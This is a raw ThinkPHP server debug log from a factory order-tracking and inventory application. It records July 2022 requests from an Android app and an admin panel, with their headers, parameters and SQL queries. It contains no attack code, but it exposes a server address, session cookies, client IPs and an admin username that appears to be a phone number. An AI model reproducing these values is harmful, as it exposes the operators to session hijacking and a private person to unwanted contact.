[运行时间:0.020304s][吞吐率:49.25req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000042s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001242s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:15:13+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.018201s][吞吐率:54.94req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001029s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:15:17+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020915s][吞吐率:47.81req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000054s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001179s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:15:21+08:00 ] 221.192.178.45 POST /api/kuguan/order/updaterukuliangbyid?staff_id=99&orderId=6637&rukuliang=5200&fpsl=0 [ info ] 47.105.33.115:8081/api/kuguan/order/updaterukuliangbyid?staff_id=99&orderId=6637&rukuliang=5200&fpsl=0 [运行时间:0.066982s][吞吐率:14.93req/s] [内存消耗:5,065.74kb] [文件加载:80] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000055s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001273s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'kuguan.order', 2 => 'updaterukuliangbyid', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=kotd47fn3qlt2emign2nuin444', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'staff_id' => '99', 'orderId' => '6637', 'rukuliang' => '5200', 'fpsl' => '0', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001567s ] [ info ] [ RUN ] app\api\controller\kuguan\Order->updaterukuliangbyid[ /alidata/www/gendan/application/api/controller/kuguan/Order.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000351s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.001951s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `id` = 99 LIMIT 1 [ RunTime:0.000335s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.001346s ] [ sql ] [ SQL ] SELECT * FROM `ot_orderinfo` WHERE `id` = 6637 LIMIT 1 [ RunTime:0.000425s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.001023s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 1268 LIMIT 1 [ RunTime:0.000253s ] [ sql ] [ SQL ] UPDATE `ot_productinfo` SET `kucun`=5200,`updatetime`=1658308521 WHERE `id` = 1268 [ RunTime:0.000398s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_kehu` [ RunTime:0.001157s ] [ sql ] [ SQL ] SELECT `orderinfo`.`id`,`orderinfo`.`nei_number`,`orderinfo`.`number`,`orderinfo`.`pid`,`orderinfo`.`order_company`,`orderinfo`.`order_connect`,`orderinfo`.`order_phone`,`orderinfo`.`kehu_id`,`orderinfo`.`price`,`orderinfo`.`material_id`,`orderinfo`.`pProductinfo_id`,`orderinfo`.`productinfo_id`,`orderinfo`.`order_type`,`orderinfo`.`order_status`,`orderinfo`.`all_order_status`,`orderinfo`.`shengchan_status`,`orderinfo`.`zuixinshuoming`,`orderinfo`.`guzhangshu`,`orderinfo`.`zuixinguzhang`,`orderinfo`.`techprocess_id`,`orderinfo`.`actual_amount`,`orderinfo`.`kucun_amount`,`orderinfo`.`produce_amount`,`orderinfo`.`produced_amount`,`orderinfo`.`waste_amount`,`orderinfo`.`produced_time`,`orderinfo`.`send_amount`,`orderinfo`.`ruku_posi`,`orderinfo`.`sent_amount`,`orderinfo`.`out_time`,`orderinfo`.`build_order_staffid`,`orderinfo`.`factorymge_id`,`orderinfo`.`admin_id`,`orderinfo`.`remind_day`,`orderinfo`.`build_time`,`orderinfo`.`end_time`,`orderinfo`.`responsible_staffinfos`,`orderinfo`.`responsible_staffinfovars`,`orderinfo`.`feedback`,`orderinfo`.`guoqitime`,`orderinfo`.`guoqi_status`,`orderinfo`.`put_position`,`orderinfo`.`createtime`,`orderinfo`.`updatetime`,`orderinfo`.`is_modify`,`orderinfo`.`purchaseorder_id`,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime,kehu.id AS kehu__id,kehu.name AS kehu__name,kehu.phone1 AS kehu__phone1,kehu.phone2 AS kehu__phone2,kehu.qq AS kehu__qq,kehu.email AS kehu__email,kehu.receiving_address AS kehu__receiving_address,kehu.normalstatus AS kehu__normalstatus,kehu.factorymge_id AS kehu__factorymge_id,kehu.source_fac_id AS kehu__source_fac_id,kehu.admin_id AS kehu__admin_id,kehu.createtime AS kehu__createtime,kehu.updatetime AS kehu__updatetime,parentproductinfo.id AS parentproductinfo__id,parentproductinfo.product_avatar AS parentproductinfo__product_avatar,parentproductinfo.name AS parentproductinfo__name,parentproductinfo.product_num AS parentproductinfo__product_num,parentproductinfo.kucun AS parentproductinfo__kucun,parentproductinfo.takeup_kucun AS parentproductinfo__takeup_kucun,parentproductinfo.staff_ids AS parentproductinfo__staff_ids,parentproductinfo.staff_names AS parentproductinfo__staff_names,parentproductinfo.pid AS parentproductinfo__pid,parentproductinfo.corresponding_num AS parentproductinfo__corresponding_num,parentproductinfo.position AS parentproductinfo__position,parentproductinfo.price AS parentproductinfo__price,parentproductinfo.factorymge_id AS parentproductinfo__factorymge_id,parentproductinfo.product_status AS parentproductinfo__product_status,parentproductinfo.admin_id AS parentproductinfo__admin_id,parentproductinfo.createtime AS parentproductinfo__createtime,parentproductinfo.updatetime AS parentproductinfo__updatetime FROM `ot_orderinfo` `orderinfo` LEFT JOIN `ot_productinfo` `productinfo` ON `orderinfo`.`productinfo_id`=`productinfo`.`id` LEFT JOIN `ot_kehu` `kehu` ON `orderinfo`.`kehu_id`=`kehu`.`id` LEFT JOIN `ot_productinfo` `parentproductinfo` ON `orderinfo`.`pProductinfo_id`=`parentproductinfo`.`id` WHERE `orderinfo`.`pid` = '6637' AND ( order_status!= '6' ) [ RunTime:0.004598s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_purchaseorder` [ RunTime:0.001411s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_material` [ RunTime:0.000979s ] [ sql ] [ SQL ] SELECT `purchaseorder`.`id`,`purchaseorder`.`number`,`purchaseorder`.`supplier_factory_id`,`purchaseorder`.`sup_order_id`,`purchaseorder`.`material_id`,`purchaseorder`.`orderinfo_id`,`purchaseorder`.`order_amount`,`purchaseorder`.`kucun_amount`,`purchaseorder`.`amount`,`purchaseorder`.`lingqu_amount`,`purchaseorder`.`daohuo_amount`,`purchaseorder`.`price`,`purchaseorder`.`suppliercustomer_id`,`purchaseorder`.`factorymge_id`,`purchaseorder`.`admin_id`,`purchaseorder`.`order_status`,`purchaseorder`.`build_time`,`purchaseorder`.`remind_day`,`purchaseorder`.`end_time`,`purchaseorder`.`responsible_staffinfos`,`purchaseorder`.`responsible_staffinfovars`,`purchaseorder`.`bind_pro_id`,`purchaseorder`.`bind_mat_id`,`purchaseorder`.`beizhu`,`purchaseorder`.`feedback`,`purchaseorder`.`order_type`,`purchaseorder`.`guoqitime`,`purchaseorder`.`guoqi_status`,`purchaseorder`.`createtime`,`purchaseorder`.`updatetime`,`purchaseorder`.`is_modify`,material.id AS material__id,material.name AS material__name,material.number AS material__number,material.avatar AS material__avatar,material.amount AS material__amount,material.warn_amount AS material__warn_amount,material.occupy_amount AS material__occupy_amount,material.factorymge_id AS material__factorymge_id,material.is_stop_status AS material__is_stop_status,material.admin_id AS material__admin_id,material.price AS material__price,material.danwei AS material__danwei,material.quehuo_status AS material__quehuo_status,material.put_position AS material__put_position,material.is_has_sup AS material__is_has_sup,material.staff_ids AS material__staff_ids,material.staff_names AS material__staff_names,material.createtime AS material__createtime,material.updatetime AS material__updatetime,material.is_delete AS material__is_delete,bindmaterial.id AS bindmaterial__id,bindmaterial.name AS bindmaterial__name,bindmaterial.number AS bindmaterial__number,bindmaterial.avatar AS bindmaterial__avatar,bindmaterial.amount AS bindmaterial__amount,bindmaterial.warn_amount AS bindmaterial__warn_amount,bindmaterial.occupy_amount AS bindmaterial__occupy_amount,bindmaterial.factorymge_id AS bindmaterial__factorymge_id,bindmaterial.is_stop_status AS bindmaterial__is_stop_status,bindmaterial.admin_id AS bindmaterial__admin_id,bindmaterial.price AS bindmaterial__price,bindmaterial.danwei AS bindmaterial__danwei,bindmaterial.quehuo_status AS bindmaterial__quehuo_status,bindmaterial.put_position AS bindmaterial__put_position,bindmaterial.is_has_sup AS bindmaterial__is_has_sup,bindmaterial.staff_ids AS bindmaterial__staff_ids,bindmaterial.staff_names AS bindmaterial__staff_names,bindmaterial.createtime AS bindmaterial__createtime,bindmaterial.updatetime AS bindmaterial__updatetime,bindmaterial.is_delete AS bindmaterial__is_delete,bindproduct.id AS bindproduct__id,bindproduct.product_avatar AS bindproduct__product_avatar,bindproduct.name AS bindproduct__name,bindproduct.product_num AS bindproduct__product_num,bindproduct.kucun AS bindproduct__kucun,bindproduct.takeup_kucun AS bindproduct__takeup_kucun,bindproduct.staff_ids AS bindproduct__staff_ids,bindproduct.staff_names AS bindproduct__staff_names,bindproduct.pid AS bindproduct__pid,bindproduct.corresponding_num AS bindproduct__corresponding_num,bindproduct.position AS bindproduct__position,bindproduct.price AS bindproduct__price,bindproduct.factorymge_id AS bindproduct__factorymge_id,bindproduct.product_status AS bindproduct__product_status,bindproduct.admin_id AS bindproduct__admin_id,bindproduct.createtime AS bindproduct__createtime,bindproduct.updatetime AS bindproduct__updatetime FROM `ot_purchaseorder` `purchaseorder` LEFT JOIN `ot_material` `material` ON `purchaseorder`.`material_id`=`material`.`id` LEFT JOIN `ot_material` `bindmaterial` ON `purchaseorder`.`bind_mat_id`=`bindmaterial`.`id` LEFT JOIN `ot_productinfo` `bindproduct` ON `purchaseorder`.`bind_pro_id`=`bindproduct`.`id` WHERE `orderinfo_id` = 6637 AND `order_status` IN (1,2) AND `order_type` = 4 [ RunTime:0.000940s ] [ sql ] [ SQL ] UPDATE `ot_orderinfo` SET `produced_amount`=5200,`waste_amount`=0,`produced_time`=1658308521,`order_status`='3',`updatetime`=1658308521 WHERE `id` = 6637 [ RunTime:0.000502s ] --------------------------------------------------------------- [ 2022-07-20T17:15:21+08:00 ] 221.192.178.45 POST /api/kuguan/order/getnotruorderbuid?staff_id=99&offset=0&pageNum=10 [ info ] 47.105.33.115:8081/api/kuguan/order/getnotruorderbuid?staff_id=99&offset=0&pageNum=10 [运行时间:0.055124s][吞吐率:18.14req/s] [内存消耗:4,769.87kb] [文件加载:76] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000052s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001226s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'kuguan.order', 2 => 'getnotruorderbuid', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=kotd47fn3qlt2emign2nuin444', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'staff_id' => '99', 'offset' => '0', 'pageNum' => '10', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001773s ] [ info ] [ RUN ] app\api\controller\kuguan\Order->getnotruorderbuid[ /alidata/www/gendan/application/api/controller/kuguan/Order.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000484s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.001486s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `id` = 99 LIMIT 1 [ RunTime:0.000326s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.001421s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.001075s ] [ sql ] [ SQL ] SELECT `orderinfo`.`id`,`orderinfo`.`nei_number`,`orderinfo`.`number`,`orderinfo`.`pid`,`orderinfo`.`order_company`,`orderinfo`.`order_connect`,`orderinfo`.`order_phone`,`orderinfo`.`kehu_id`,`orderinfo`.`price`,`orderinfo`.`material_id`,`orderinfo`.`pProductinfo_id`,`orderinfo`.`productinfo_id`,`orderinfo`.`order_type`,`orderinfo`.`order_status`,`orderinfo`.`all_order_status`,`orderinfo`.`shengchan_status`,`orderinfo`.`zuixinshuoming`,`orderinfo`.`guzhangshu`,`orderinfo`.`zuixinguzhang`,`orderinfo`.`techprocess_id`,`orderinfo`.`actual_amount`,`orderinfo`.`kucun_amount`,`orderinfo`.`produce_amount`,`orderinfo`.`produced_amount`,`orderinfo`.`waste_amount`,`orderinfo`.`produced_time`,`orderinfo`.`send_amount`,`orderinfo`.`ruku_posi`,`orderinfo`.`sent_amount`,`orderinfo`.`out_time`,`orderinfo`.`build_order_staffid`,`orderinfo`.`factorymge_id`,`orderinfo`.`admin_id`,`orderinfo`.`remind_day`,`orderinfo`.`build_time`,`orderinfo`.`end_time`,`orderinfo`.`responsible_staffinfos`,`orderinfo`.`responsible_staffinfovars`,`orderinfo`.`feedback`,`orderinfo`.`guoqitime`,`orderinfo`.`guoqi_status`,`orderinfo`.`put_position`,`orderinfo`.`createtime`,`orderinfo`.`updatetime`,`orderinfo`.`is_modify`,`orderinfo`.`purchaseorder_id`,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime FROM `ot_orderinfo` `orderinfo` LEFT JOIN `ot_productinfo` `productinfo` ON `orderinfo`.`productinfo_id`=`productinfo`.`id` WHERE `orderinfo`.`pid` = 0 AND `orderinfo`.`factorymge_id` = 40 AND ( orderinfo.order_status in ('1','2') ) AND ( orderinfo.order_type in ('1','2','3') ) AND ( `productinfo`.`name` LIKE '%%' OR `responsible_staffinfovars` LIKE '%%' ) AND ( orderinfo.produce_amount > 0 ) ORDER BY 1658308521>orderinfo.end_time desc,1658308521>orderinfo.end_time desc,1658308521-orderinfo.end_time + orderinfo.remind_day * 24*60*60 desc, orderinfo.updatetime desc LIMIT 0,10 [ RunTime:0.002517s ] --------------------------------------------------------------- [ 2022-07-20T17:15:21+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.021419s][吞吐率:46.69req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000043s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001158s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:16:58+08:00 ] 106.112.205.110 GET /admin/financial/accountspayable/addyifu?dialog=1 [ info ] 47.105.33.115:8081/admin/financial/accountspayable/addyifu?dialog=1 [运行时间:0.049269s][吞吐率:20.30req/s] [内存消耗:5,260.68kb] [文件加载:81] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000043s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001094s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.accountspayable', 2 => 'addyifu', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'upgrade-insecure-requests' => '1', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable?addtabs=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'dialog' => '1', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001501s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ RUN ] app\admin\controller\financial\Accountspayable->addyifu[ /alidata/www/gendan/application/admin/controller/financial/Accountspayable.php ] [ info ] [ VIEW ] /alidata/www/gendan/public/../application/admin/view/financial/accountspayable/addyifu.html [ array ( 0 => 'breadcrumb', 1 => 'site', 2 => 'config', 3 => 'auth', 4 => 'admin', 5 => 'adminid', 6 => 'faccount', 7 => 'subjectTypeList', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000096s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000461s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.001315s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000535s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.001541s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001155s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001776s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000379s ] --------------------------------------------------------------- [ 2022-07-20T17:16:58+08:00 ] 106.112.205.110 GET /admin/ajax/lang?callback=define&controllername=financial.accountspayable&v=1658308618 [ info ] 47.105.33.115:8081/admin/ajax/lang?callback=define&controllername=financial.accountspayable&v=1658308618 [运行时间:0.031570s][吞吐率:31.68req/s] [内存消耗:3,854.60kb] [文件加载:72] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000045s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001076s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'ajax', 2 => 'lang', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable/addyifu?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'callback' => 'define', 'controllername' => 'financial.accountspayable', 'v' => '1658308618', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001516s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/ajax.php [ info ] [ RUN ] app\admin\controller\Ajax->lang[ /alidata/www/gendan/application/admin/controller/Ajax.php ] [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000101s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:16:59+08:00 ] 106.112.205.110 POST /admin/staffmge/suppliercustomer/getfacsuppliercustomer [ info ] 47.105.33.115:8081/admin/staffmge/suppliercustomer/getfacsuppliercustomer [运行时间:0.052157s][吞吐率:19.17req/s] [内存消耗:4,963.20kb] [文件加载:80] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000047s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001170s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'staffmge.suppliercustomer', 2 => 'getfacsuppliercustomer', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'content-length' => '171', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'origin' => 'http://47.105.33.115:8081', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable/addyifu?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'q_word' => array ( 0 => '', ), 'pageNumber' => '1', 'pageSize' => '10', 'andOr' => 'AND', 'orderBy' => array ( 0 => array ( 0 => 'name', 1 => 'ASC', ), ), 'searchTable' => 'tbl', 'showField' => 'name', 'keyField' => 'id', 'searchField' => array ( 0 => 'name', ), 'name' => '', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001702s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/staffmge/suppliercustomer.php [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\staffmge\Suppliercustomer->getfacsuppliercustomer[ /alidata/www/gendan/application/admin/controller/staffmge/Suppliercustomer.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.007921s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000573s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_suppliercustomer` [ RunTime:0.001462s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `ot_suppliercustomer` WHERE ( `name` LIKE '%%' ) AND ( factorymge_id =40 ) AND ( 1=1 ) LIMIT 1 [ RunTime:0.000563s ] [ sql ] [ SQL ] SELECT * FROM `ot_suppliercustomer` WHERE ( `name` LIKE '%%' ) AND ( factorymge_id =40 ) AND ( 1=1 ) ORDER BY `name` ASC LIMIT 0,10 [ RunTime:0.000410s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.001505s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('' , '{\"q_word\":[\"\"],\"pageNumber\":\"1\",\"pageSize\":\"10\",\"andOr\":\"AND\",\"orderBy\":[[\"name\",\"ASC\"]],\"searchTable\":\"tbl\",\"showField\":\"name\",\"keyField\":\"id\",\"searchField\":[\"name\"],\"name\":\"\"}' , '/admin/staffmge/suppliercustomer/getfacsuppliercustomer' , 74 , '15233178605' , 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36' , '106.112.205.110' , 1658308619) [ RunTime:0.005119s ] --------------------------------------------------------------- [ 2022-07-20T17:17:01+08:00 ] 106.112.205.110 POST /admin/staffmge/suppliercustomer/getfacsuppliercustomer [ info ] 